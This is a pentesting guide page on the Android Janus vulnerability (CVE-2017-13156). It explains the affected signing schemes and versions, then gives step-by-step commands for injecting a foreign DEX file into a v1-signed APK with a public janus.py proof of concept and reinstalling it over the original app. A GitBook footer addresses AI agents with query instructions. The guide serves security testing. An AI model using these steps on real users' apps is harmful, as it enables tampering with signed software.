> For the complete documentation index, see [llms.txt](https://sec88.0x88.online/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sec88.0x88.online/android-appsec/janus-vulnerability-cve-2017-13156.md). # Janus Vulnerability (CVE-2017-13156) ## Whats Janus Vulnerability A serious vulnerability in Android allows attackers to inject a DEX file into an APK file without affecting the signatures. ## Details 1. On device running android version 5.X & 6.X, Apk signature was verified using only v1 scheme Janus vulnerability was found in v1 signing scheme and google released a patch on 2017 December 01 to fix Janus on these android versions. so even though apk is signed only with v1 which can bem run on 5.x & 6.x, if 2017 December 01 patch is installed in the device Janus cannot be exploited. 2. After releasing the patch for Janus, Google released v2 signing scheme and prioritized device to use v2 scheme over v1 scheme if v2 was used along with v1 scheme but they did not integrate the patch into the system until android 8.1. This made possible to exploit Janus on android 7.x & 8.0 also, as long as 2017 December patch is not installed. 3. Applications signed with v2 or v3 along with v1 are also vulnerable to Janus if they are made to run on android versions 5.x & 6.x as it verifies only v1 scheme without installing the patch. 4. Finally v1 scheme was removed and V4 scheme has been introduced in Android 11, Applications that are only signed with v1 scheme will not run on Android 11 ## How to Test * [ ] We use [apksigner](https://medium.com/mobis3c/setting-up-an-android-pentesting-environment-29991aa0c3f1#46c8) tool to find the signature schemes used by the application ```bash apksigner verify -verbose h5.apk ```

apk has been signed only with v1, no v2 or v3 signature

* [ ] Use [apktool](https://medium.com/mobis3c/setting-up-an-android-pentesting-environment-29991aa0c3f1#37de) to find the min android version on which we can run this application

Application can be run on API Level 15(Android 4.0.4 Ice Cream Sandwich), so we can choose any device from 5.x, 6.x, 7.x & 8.0 to exploit it.

```bash apktool -s d h5.apk && cat h5/apktool.yml | grep minSdk ``` * [ ] Get classes.dex from any other apk ```bash apktool -s d WhatsApp.apk && mv WhatsApp/classes.dex ``` * [ ] To Inject this classes.dex file into our h5 application, we use this exploit code from [**VEO**’s repo](https://raw.githubusercontent.com/V-E-O/PoC/master/CVE-2017-13156/janus.py). Copy the code and create new file named **janus.py** and paste into it ```bash python janus.py classes.dex h5.apk kal-h5.apk ```
* [ ] Install adb exploit ``` adb install h5.apk adb install -r kal-h5.apk ``` ## Automation {% embed url="" %} ``` # Basic APK analysis go run main.go -apk path/to/your.apk # Analysis with custom POC dex file go run main.go -apk path/to/your.apk -dex path/to/poc.dex ``` ## Resources {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sec88.0x88.online/android-appsec/janus-vulnerability-cve-2017-13156.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.